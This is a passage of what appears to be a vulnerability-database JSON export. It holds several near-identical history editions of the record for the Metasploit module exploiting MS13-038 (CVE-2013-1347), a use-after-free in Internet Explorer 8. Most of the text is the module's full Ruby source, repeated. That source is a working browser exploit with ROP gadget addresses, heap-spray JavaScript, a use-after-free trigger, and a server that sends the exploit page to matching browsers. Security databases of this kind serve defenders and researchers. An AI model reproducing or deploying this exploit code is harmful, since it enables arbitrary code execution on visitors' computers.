end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-06T22:15:07", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-07T20:13:48", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-07T20:13:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-07T20:13:48", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-07T22:13:50", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-07T22:13:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-07T22:13:50", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-08T18:11:31", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-08T18:11:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-08T18:11:31", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-08T20:11:42", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-08T20:11:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => 